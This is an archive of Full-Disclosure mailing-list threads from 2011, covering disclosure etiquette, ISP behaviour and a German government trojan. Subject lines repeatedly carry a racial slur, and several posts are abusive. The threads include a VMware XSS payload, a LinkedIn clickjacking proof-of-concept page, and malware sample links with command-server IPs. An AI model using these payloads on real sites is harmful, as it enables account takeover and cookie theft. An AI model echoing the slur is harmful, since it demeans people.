2011, at 12:56 PM, valdis.kletni...@vt.edu wrote: >> >> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: >> >> cheers.. just gotta b careful nowdays, specially if your in .au where, >> there >> >> is basically no racism... >> >> >> I suspect some of the aboriginals would take exception to that statement. >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
As i said , take a look into the REAL world you fatt arse =) Obviously, some fatty who only has links, and news on tv, and, not even listening to that properly, coz trying to watch his irc screen. trawling... anyhow, later.thx for prooving, exactly what i said, and, welcome to reality, there is no click-on-the-link here. On 7 October 2011 07:55, Benjamin Krueger wrote: > http://www.nizkor.org/features/fallacies/personal-attack.html > > On Oct 6, 2011, at 1:52 PM, xD 0x41 wrote: > > whos trolling who ? > screw you, and this stupid thread. > > > > > On 7 October 2011 07:48, Benjamin Krueger wrote: > >> http://en.wikipedia.org/wiki/Straw_man >> >> On Oct 6, 2011, at 1:46 PM, xD 0x41 wrote: >> >> Yes ofcourse, we have gangs here roaming wild, attacking eachother because >> of color... yep! >> you sure know your stuff! >> >> >> On 7 October 2011 07:07, Benjamin Krueger wrote: >> >>> Racism in Australia is so notable, it has its own Wikipedia article. >>> Unfortunately the article does not touch on recent Australian racism, >>> particularly amongst government officials, against African refugees and >>> immigrants. >>> >>> http://en.wikipedia.org/wiki/Racism_in_Australia >>> >>> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote: >>> >>> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said: >>> >>> cheers.. just gotta b careful nowdays, specially if your in .au where, >>> there >>> >>> is basically no racism... >>> >>> >>> I suspect some of the aboriginals would take exception to that statement. >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> >>> >> >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
hrm On 7 October 2011 06:31, andrew.wallace wrote: > On Thu, Oct 6, 2011 at 6:21 PM, Georgi Guninski > wrote: > > risking n3td3v fate, sorry for offtopic. > > > > the nigger said [1] (no offense intended to black people): > > > > "American people understand that not everybody's been following the > rules," he said. "These days, a lot of folks doing the right thing are not > rewarded. A lot of folks who are not doing the right thing are rewarded." > > > > [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html > > This list is for national security advisors and analysts to do their work > on the threats, we do not appreciate your racist slurs. > > The list is run by the British security industry in partnership with > Secunia, please do not abuse the list twice. > > --- > > Andrew Wallace > > Independent consultant > > www.n3td3v.org.uk > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
Hrm very good point there. It is obviously monitored, but really, would the mnitors, even get involved in things... i dont know if that is just part of how to stay under, but could be. I do not know how mi5/6 works but, i have heard rumors, that he is wsome form of undercover something... wich is kinda cool with me.I would prefer to know that, or even think that, than think he is a bad guy and, just being an arse because he can be... i would love some independant input from people who are working as operatives, as Valdis said,it is good to see these peoples input, especially on some topics like ITsec and exploits/pocs and anything wondeful in this area. I know i am fine with that but, amazing to howmany actual results point at n3td3v as this... i certainly wont be using crazycoders.com/.us for any posts for n3td3v,but sertainly other peoples blogs, are full of him/he ? Anyhow.. enough for me, cappucino time. cheers, xd On 7 October 2011 08:59, wrote: > On Thu, 06 Oct 2011 14:25:18 PDT, "andrew.wallace" said: > > > MI6 operative - I didn't know you delt in conspiracy. My web page clearly > > states "independent". > > Which is exactly what it *would* say if you were an undercover operative. > > http://www.google.com/search?q=n3td3v+mi5 > http://www.google.com/search?q=n3td3v+mi6 > http://www.google.com/search?q="andrew+wallace"+mi5 > http://www.google.com/search?q="andrew+wallace"+mi6 > > Certainly a lot of history there. > > In any case, whether or not you're an MI6 operative, if the list *is* for > national security advisors, isn't it silly for you to try to shut it down > because > of your anti-disclosure stance? > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Screw you dude, attaching executable doc files , and then pushing out a few *0days* I wont be looking at *any* thing attached as a doc, thats just common sense. nowdays, and there is abs NO need on this list for it, it is FD, your meant to put it in the BODY of email, or atleast maybe next time, change the type to linux 0day and attach .S file... ?? screw u and ur advisorys, fix them into proper order asin written as any would be, and ill read it, but never ask a dood to open the attachment! On 7 October 2011 22:48, asish agarwalla wrote: > Hi, > > LinkedIn_User Account Delete using Click jacking. > > This Vulnerability is accepted by LinkedIn they are in a process > to patched it but not yet patched. > > Please find the document describing the vulnerability. > > Regards > Asish > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
How about we all agree that the word itself, should not be used ever, it is not a very nice thing to call people, i mean, you dont see chinese people calling each other yellies... skin color should have no place on the list, so how about just, forgive and forget it is abit easier, or, rather just keep opinions to a consensus wich most of the list can agree upon , then you can speak to George however you like... I am just saying, it is enough about racism.. there is no place, and no talking it, it just plain sucks when it is done, we all know this, we all dislike when people would pick on things sometimes not in our control. I forgive George for his wording, i hope many others can also. cheers On 8 October 2011 01:29, wrote: > On Fri, 07 Oct 2011 09:29:22 +0300, Georgi Guninski said: > > > i am by no way a racist. > > the OP specifically wrote "no offence intended". > > being a non-native speaker if someone is offended about skin colour it is > a language mistake of mine. > > Ya know, Georgi, you can't have it both ways. I realize that that you're > not a native speaker, and possibly not up to speed on all the ins and outs > of cultural and race relations over here. So I would actually have been > willing to give you the benefit of the doubt, that it was an honest mistake > and > you really didn't know that it had different meanings than if you had said > "The > black dude in charge". > > But then you go and stick "no offence intended" on it, which means that (a) > you > *did* understand the difference, and (b) you *didn't* go back and change it > to > "the black dude in charge" or something before you hit Send. And at that > point, > you forfeit any right to claim that it was a language mistake. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"
On the whole security topc... apparently *some* VPNs claim to be indestructible... Which VPN Providers Really Take Anonymity Seriously? http://feed.torrentfreak.com/~r/Torrentfreak/~3/9l5B4f6Fkbw/ Thru rss feed... interesting read. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Hi, Another security expert... sheesh... and they cannot do simplest of tasks, makes me wonder really how do they get anything atall coded, but then again i doubt there is code... I bet theyre all some persistent xss etc... wich would req some fuzz tool... well, cewrtainly see better people like kcope who does not call himself any senior security, yet has made many of remote exploits, and he posts them in his so, it should be i think put in the email-bdy, responsibly that is. That would be good to have but since everyone company takes ITsec so differently, i know MS and Google have great disclosure policies, but this is supposed to be on theyre end, not ours... so i guess its another good question. cheers xd On 8 October 2011 06:25, Peter Dawson wrote: > if I get it right this dude is supposed to be " > >- Senior Security Analyst at iViZ Techno Solutions Pvt. > Ltd.<http://www.linkedin.com/company/iviz-techno-solutions-pvt.-ltd.?trk=ppro_cprof> > > Whatever happened on protocol's for responsible disclosure ? > > On Fri, Oct 7, 2011 at 3:05 PM, xD 0x41 wrote: > >> Screw you dude, attaching executable doc files , and then pushing out a >> few *0days* >> I wont be looking at *any* thing attached as a doc, thats just common >> sense. nowdays, and there is abs NO need on this list for it, it is FD, your >> meant to put it in the BODY of email, or atleast maybe next time, change the >> type to linux 0day and attach .S file... ?? >> screw u and ur advisorys, fix them into proper order asin written as any >> would be, and ill read it, but never ask a dood to open the attachment! >> >> >> >> >> On 7 October 2011 22:48, asish agarwalla wrote: >> >>> Hi, >>> >>> LinkedIn_User Account Delete using Click jacking. >>> >>> This Vulnerability is accepted by LinkedIn they are in a process >>> to patched it but not yet patched. >>> >>> Please find the document describing the vulnerability. >>> >>> Regards >>> Asish >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Verizon Wireless DNS Tunneling
Interesting thread... issues of privacy are again raping the tech world.. please assist in exposing comcast if this is indeed true. Either someone has been playing admin and put up some kind of fake login page although thats highly unlikely,proof of the actual deployment of an exe by the isp is a huge issue. I know some isp's make use of port 80, and remote-assist,but they do not rely on it,not in a usual Isp that is forsure. Comcast is huge, id be looking into it more and gathering REAL HARD proof of this,wether it was a tech acting alone or infact some kind of page they have forwaded you to to "assist" possibly..if you can recall any recent interactions with comcast,and what took place, this would also help. You want exactly what page was downloaded FROM and then ask them about it (beforehand though makesure to also check theyre TOS regarding theyre usage of anything - i doubt this would be visible so you maybe onto a winnder),it would be great to see it even this exe and allow the list to debug it. That would then probably give you plenty of info about the executable IF it was installed by a comcast tech, you could then sue for that and any *damages* or, just having a slower line/instability/droputs/downage etc etc i would definately be looking into it before assuming it is comcasts exe 100%. It is a massive breach of privacy if this is how they are acting, unless it is standard practice for some cases where they may assist remotely, and then would probably need some diagnostic executables,but really this should not be hard to find.. I would get your logs out and even take a peek into tmp of your downloads for IE/FF or whatever your browser, and try to trace it to when it was implanted. Goodluck,cheers! xd On 8 October 2011 01:47, Terrence wrote: > To the guy saying that comcast requires an executable to authenticate you. > Ha. You should prolly wipe your install. > On Oct 7, 2011 10:41 AM, wrote: > >> On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said: >> >> > That would probably explain why the Comcast service page downloads an >> > executable to authenticate you. At that point they have control over >> the >> > end user's machine and can either clear the DNS cache or force a reboot. >> >> That must suck if you're a non-Windows user. ;) >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting
nice find. Please, put your FULL PoC within the email BODY when you are sending out disclosures..It would make some of us certainly feel abit better about reading them... specially when gmaqil refuses or has problems scanning, that should not happen, it should pass straight through... do your own testing, send from anywhere to gmail/googlemail and watch what the AV scannner says 9and believe me they have a very cool scanner)... On 8 October 2011 16:42, asish agarwalla wrote: > *Non-**Persistence/**Reflected Cross-Site Scripting* > > > http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey= > "/>alert(document.cookie)&category=all&isVmwareReadySelected=no > > > *Persistence Cross-Site Scripting* > > Create a account in VMWARE. Insert First Name as : test > "/>>alert(document.cookie)., Inserted script stored as > first name. > > Login to vmware, Select Login to as Manage Orders, Inserted script get > executed. > > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Thats just lame dude if you could remove OTHER poples accounts, then id
say 8clap clap*... but own account... whjat about just clicking "close
account" , and lets skip creating a html page, for this... :) cheers
On 8 October 2011 17:06, asish agarwalla wrote:
> Be logged into Linkedin, in firefox
> Create a HTML page using the below code
> Open the created HTML page in a new firefox tab
> Play the simple game
>
>
>
>
>
> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> #Div3{
> opacity: 0;
> position: absolute;
> top: 25px;
> left: 160px;
>
> }
> #Div2{
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 340px;
>
> }
> #Div1 {
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 195px;
>
> }
> #victim2 {
> opacity: 1;
> position: absolute;
> top: 65px;
> left: 50px;
>
> }
> #victim {
> opacity: 0.4;
> position: absolute;
> top: -226px;
> left: -35px;
>
> width:800px;
> height: 800px;
> }
>
>
>
>
> Please Click Twice on the Right Options And Then Click Submit
>
>
> 55+27=?
>
>
> 55
>
>
> 82
>
>
> 95
>
>
> Submit
>
> https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1";
> border=0 scrolling=no width=650 height=1100>
>
>
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
seems that you aren't familiar what Clickjacking means then...
No,... and am happy not to know :-) , like XSS , i do not waste time with
ninoritiy bugs such as 'clickjacking' and these new such terms wich are
total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and
simple-xss) CRAP!)
xd
On 10 October 2011 04:53, Ferenc Kovacs wrote:
> it seems that you aren't familiar what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 wrote:
> > Thats just lame dude if you could remove OTHER poples accounts, then
> id
> > say 8clap clap*... but own account... whjat about just clicking "close
> > account" , and lets skip creating a html page, for this... :) cheers
> >
> >
> > On 8 October 2011 17:06, asish agarwalla
> wrote:
> >>
> >> Be logged into Linkedin, in firefox
> >> Create a HTML page using the below code
> >> Open the created HTML page in a new firefox tab
> >> Play the simple game
> >>
> >>
> >>
> >>
> >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> >> #Div3{
> >> opacity: 0;
> >> position: absolute;
> >> top: 25px;
> >> left: 160px;
> >> }
> >> #Div2{
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 340px;
> >> }
> >> #Div1 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 195px;
> >> }
> >> #victim2 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 50px;
> >> }
> >> #victim {
> >> opacity: 0.4;
> >> position: absolute;
> >> top: -226px;
> >> left: -35px;
> >> width:800px;
> >> height: 800px;
> >> }
> >>
> >>
> >>
> >>
> >> Please Click Twice on the Right Options And Then Click Submit
> >>
> >>
> >> 55+27=?
> >>
> >>
> >> 55
> >>
> >>
> >> 82
> >>
> >>
> >> 95
> >>
> >> Submit
> >>
> >> >> src="
> https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1
> "
> >> border=0 scrolling=no width=650 height=1100>
> >>
> >>
> >>
> >>
> >>
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")
Interesting... although that archive seems corrupt... id like to see abit more about this but, very interesting indeed.. specially skype id harvesting, what could this be for. hrms xd On 10 October 2011 07:13, wrote: > On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned > wrote: > > Hi List, > > > > i thougt this could be interesting. My english is not very good so i > > copied the following information from FSecure > > (http://www.f-secure.com/weblog/archives/2249.html [1]) > > > > "Chaos Computer Club from Germany has tonight announced that they > > have located a backdoor trojan used by the German Goverment. > > > > The announcment was made public on ccc.de [2] with a detailed 20-page > > analysis of the functionality of the malware. Download the report in > > PDF [3] (in German) > > > > The malware in question is a Windows backdoor consisting of a DLL and > > a kernel driver. > > > > The backdoor includes a keylogger that targets certain applications. > > These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and > > others. > > > > The backdoor also contains code intended to take screenshots and > > record audio, including recording Skype calls. > > > > In addition, the backdoor can be remotely updated. Servers that it > > connects to include 83.236.140.90 [4] and 207.158.22.134" > > > > According to CCC Germany the backdoor could also be exploited by > > third parties. You can download it from > > http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz > > [5] . You'll need gzip and tar to get the .dll and the .sys file. > > > > > > Links: > > -- > > [1] http://www.f-secure.com/weblog/archives/2249.html > > [2] http://www.ccc.de/ > > [3] > > > > http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf > > [4] http://webmail.0m3ga.net/tel:83.236.140.90 > > [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz > > I was looking at this just late last night. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")
Ta , ill take a look.. very interesting, id love to see src code ;p That would be in whose hands,... i wonder..hehe.. maybe gov orjustr very very smart hax0r... On 10 October 2011 10:21, You Got Pwned wrote: > gunzip the archive then use tar. I also made a zip file which contains the > extracted .dll and the .sys file and uploaded it > here<http://www.2shared.com/file/QWyk-yCp/bundestrojaner.html> > . > > > 2011/10/10 xD 0x41 > >> Interesting... although that archive seems corrupt... id like to see abit >> more about this but, very interesting indeed.. specially skype id >> harvesting, what could this be for. >> hrms >> xd >> >> >> On 10 October 2011 07:13, wrote: >> >>> On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned >>> wrote: >>> > Hi List, >>> > >>> > i thougt this could be interesting. My english is not very good so i >>> > copied the following information from FSecure >>> > (http://www.f-secure.com/weblog/archives/2249.html [1]) >>> > >>> > "Chaos Computer Club from Germany has tonight announced that they >>> > have located a backdoor trojan used by the German Goverment. >>> > >>> > The announcment was made public on ccc.de [2] with a detailed 20-page >>> > analysis of the functionality of the malware. Download the report in >>> > PDF [3] (in German) >>> > >>> > The malware in question is a Windows backdoor consisting of a DLL and >>> > a kernel driver. >>> > >>> > The backdoor includes a keylogger that targets certain applications. >>> > These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and >>> > others. >>> > >>> > The backdoor also contains code intended to take screenshots and >>> > record audio, including recording Skype calls. >>> > >>> > In addition, the backdoor can be remotely updated. Servers that it >>> > connects to include 83.236.140.90 [4] and 207.158.22.134" >>> > >>> > According to CCC Germany the backdoor could also be exploited by >>> > third parties. You can download it from >>> > http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz >>> > [5] . You'll need gzip and tar to get the .dll and the .sys file. >>> > >>> > >>> > Links: >>> > -- >>> > [1] http://www.f-secure.com/weblog/archives/2249.html >>> > [2] http://www.ccc.de/ >>> > [3] >>> > >>> > >>> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf >>> > [4] http://webmail.0m3ga.net/tel:83.236.140.90 >>> > [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz >>> >>> I was looking at this just late last night. >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
No, i have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) Im to old for that. Never been a victim yet, in *any* way, and, certainly, those bugs wont be starting a trend.. cheer. xd On 10 October 2011 10:27, wrote: > On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: > > > No,... and am happy not to know :-) , like XSS , i do not waste time with > > ninoritiy bugs such as 'clickjacking' and these new such terms wich are > > total BS. > > It's all total BS till you discover you're a victim of the attack. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
YEP! When ya do it right, dang right it is! I did never reproduce the EXACT ethod wich made the x41's happen... but, i dun really care for that bug, or you call it a feature..well, i dont know feratures wich have x41's al;l over the emails when made in a special way... so, it was low-level to :) anyhow, no, i wont bother to recreate the email body, without using any 'features' of googles, for you. It is possible to exploit rich text editor, i have said.. the dll itself.. so maybe go investigate and stfu :) now back to the backdoor. On 10 October 2011 11:23, adam wrote: > Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right > secn3t? > > http://seclists.org/fulldisclosure/2011/Jun/215 > > On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 wrote: > >> No, i have been through these, and only an idiot would fall for any of >> these attacks... Persistent XSS maybe harder, but, forget the rest :) >> Im to old for that. >> Never been a victim yet, in *any* way, and, certainly, those bugs wont be >> starting a trend.. >> cheer. >> xd >> >> >> >> On 10 October 2011 10:27, wrote: >> >>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: >>> >>> > No,... and am happy not to know :-) , like XSS , i do not waste time >>> with >>> > ninoritiy bugs such as 'clickjacking' and these new such terms wich are >>> > total BS. >>> >>> It's all total BS till you discover you're a victim of the attack. >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Hello Michele, I will take a look, because honestly, I dont see anything good about NON persistent xss, so i will have a look and see, thanks :) cheers xd On 10 October 2011 17:24, Michele Orru wrote: > If you all think XSS, even reflected or DOM-based sucks..probably you don't > know the BeEF project. > I would suggest you to take a look at http://beefproject.com , try it, and > see yourself what you can do :-) > Cheers > antisnatchor > On 10 Oct 2011 02:56, "xD 0x41" wrote: > >> YEP! >> When ya do it right, dang right it is! >> >> I did never reproduce the EXACT ethod wich made the x41's happen... but, i >> dun really care for that bug, or you call it a feature..well, i dont know >> feratures wich have x41's al;l over the emails when made in a special way... >> so, it was low-level to :) >> anyhow, no, i wont bother to recreate the email body, without using any >> 'features' of googles, for you. >> It is possible to exploit rich text editor, i have said.. the dll itself.. >> so maybe go investigate and stfu :) >> now back to the backdoor. >> >> >> >> >> On 10 October 2011 11:23, adam wrote: >> >>> Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, >>> right secn3t? >>> >>> http://seclists.org/fulldisclosure/2011/Jun/215 >>> >>> On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 wrote: >>> >>>> No, i have been through these, and only an idiot would fall for any of >>>> these attacks... Persistent XSS maybe harder, but, forget the rest :) >>>> Im to old for that. >>>> Never been a victim yet, in *any* way, and, certainly, those bugs wont >>>> be starting a trend.. >>>> cheer. >>>> xd >>>> >>>> >>>> >>>> On 10 October 2011 10:27, wrote: >>>> >>>>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: >>>>> >>>>> > No,... and am happy not to know :-) , like XSS , i do not waste time >>>>> with >>>>> > ninoritiy bugs such as 'clickjacking' and these new such terms wich >>>>> are >>>>> > total BS. >>>>> >>>>> It's all total BS till you discover you're a victim of the attack. >>>>> >>>> >>>> >>>> ___ >>>> Full-Disclosure - We believe in it. >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>> >>> >>> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Depending on the type of cage/shielding (don't know about the local one) it can completely block communications... As i know, ISP are now blocking the infected subnets, and thus cuttiong off even scanning from being possible... but, it only takes a new bug to bypass this, and in windows and linux this is always happening.. On 11 October 2011 07:24, Christian Sciberras wrote: > Well, I know a local datacenter (can't be more than 10 years old) makes use > of a Faraday cage around it. > And it doesn't really keep any mission-critical equipment, so I guess > others out there do the same. > > Depending on the type of cage/shielding (don't know about the local one) it > can completely block communications... > > > > > > > On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt > wrote: > >> I have no idea, I assume – this is usually what they mean when they talk >> about an “air barrier” >> >> ** ** >> >> *From:* evejou [mailto:g...@techn0ev3.net] >> *Sent:* Monday, October 10, 2011 1:04 PM >> *To:* Michael Schmidt >> *Cc:* Thor (Hammer of God); Christian Sciberras; Michael T; >> full-disclosure@lists.grok.org.uk >> >> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps >> coming back” >> >> ** ** >> >> As someone kind of young (and thus no historical recollection), I'm kind >> of surprised that this is talked about in past-tense. Does this not happen >> anymore? I could see how this could get super annoying after awhile. >> >> ** ** >> >> ** ** >> >> On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt >> wrote: >> >> I know in the old days (15 years ago) – there were networks that were >> completely separate from the outside world. I remember trying to do >> telephone tech support to someone on a secure network… >> >> >> >> Tell him to do “this” >> >> He puts down the phone, goes through physical security, tries “this” >> >> He comes back though security picks up phone talks to me. >> >> >> >> Security allowed nothing that looked like portable storage in or out of >> the secure area. >> >> >> >> Rinse. >> >> Repeat. >> >> >> >> Couldn’t even place outside voice calls from the secure network area. I >> don’t know if they do this today. I also know that there used to be setups >> with removable hard drives where one drive connected you to the secure >> network and yet another drive connected to the unsecure network. – Two >> different network cards each enabled for different networks. >> >> >> >> The good old days >> >> >> >> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: >> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Thor (Hammer of >> God) >> *Sent:* Monday, October 10, 2011 10:36 AM >> *To:* Christian Sciberras; Michael T >> >> >> *Cc:* full-disclosure@lists.grok.org.uk >> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps >> coming back” >> >> >> >> Consider the source. It’s “someone close” to the operations, and that >> only according to this guy. It could very well be a slot-puller in the >> casino across the street… I’m always dubious of the reporting of this type >> of thing where the source is some “secret” person, and where there is never >> any ability to refute claims. >> >> >> >> t >> >> >> >> *From:* full-disclosure-boun...@lists.grok.org.uk >> [mailto:full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian >> Sciberras >> *Sent:* Monday, October 10, 2011 7:05 AM >> *To:* Michael T >> *Cc:* full-disclosure@lists.grok.org.uk >> *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps >> coming back” >> >> >> >> I'm talking more about their engineers than their network. >> >> >> >> If I had my network infected with a virus, I'd immediately deploy some >> form of logging/monitoring tool (eg, wireshark). >> >> >> >> Honestly, it all sounds like they're employing inexperienced engineers. >> Which is again strange, considering the field they're in. >> >> >> >> Regarding your bet, see that's already something. Why exactly can't they >> verify your bet? It isn't like viruses suddenly became invisible, is it?* >> *** >> >> >> >> I'm just curious to these questions. It's strange to hear someone saying >> "we basically have no idea what's going on". >> >> >> >> >> >> On Mon, Oct 10, 2011 at 3:40 PM, Michael T wrote:** >> ** >> >> It's a network that's 'detached', or 'segregated', or whatevered from the >> rest of the world, so it's 'largely immune to viruses'. That likely means >> they have: >> 1. NO logging >> 2. NO anti-virus >> 3. NO hardening >> >> The very fact that these systems are on a segregated network means they >> are probably more frail, and more susceptible to viruses, than a normal >> person's laptop. >> >> Immune to viruses... What a crock of shit. My bet is that it's coming >> from the planes. >> >> Mike >> >> On Mo
